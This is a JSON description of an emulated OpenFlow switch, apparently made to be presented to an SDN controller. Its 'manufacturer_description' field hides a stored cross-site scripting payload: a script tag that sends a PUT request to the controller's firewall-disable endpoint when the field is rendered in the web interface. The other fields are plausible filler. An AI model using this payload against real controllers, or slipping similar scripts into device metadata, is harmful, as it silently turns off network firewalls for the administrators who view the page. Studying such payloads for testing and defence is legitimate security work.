{
  "of-switch": {
          "vendor_id":8992,
          "description": {
                  "manufacturer_description":"Manufacturer desc<script>$.ajax({url: '/wm/firewall/module/disable/json',type: 'PUT'});</script>",
                  "hardware_description":"Hardware desc",
                  "software_description":"Software desc",
                  "serial_number":"12345",
                  "dataplane_description":"Dataplane Desc"
          },
          "features": {
                  "dataplane_id":"00:00:de:ad:be:ed:de:ad",
                  "number_of_buffers":1,
                  "number_of_tables":1,
                  "capabilities":0,
                  "actions":0
          },
          "ports":[
                    {
                      "port_no":1,
                      "hardware_address": "11:11:11:11:11:11",
                      "port_name": "eth0",
                      "port_config":0,
                      "port_state":0,
                      "port_curr":0,
                      "port_advertised":0,
                      "port_supported":0,
                      "port_peer":0
                    },
                    {
                      "port_no":2,
                      "hardware_address": "11:11:11:11:11:12",
                      "port_name": "eth1",
                      "port_config":0,
                      "port_state":0,
                      "port_curr":0,
                      "port_advertised":0,
                      "port_supported":0,
                      "port_peer":0
                    }
          ],
          "stats":{
                    "flow_stats": {
                                    "duration_sec":0,
                                    "duration_nsec":0,
                                    "packet_count":0,
                                    "byte_count":0
                    }
          }
  }
}
    
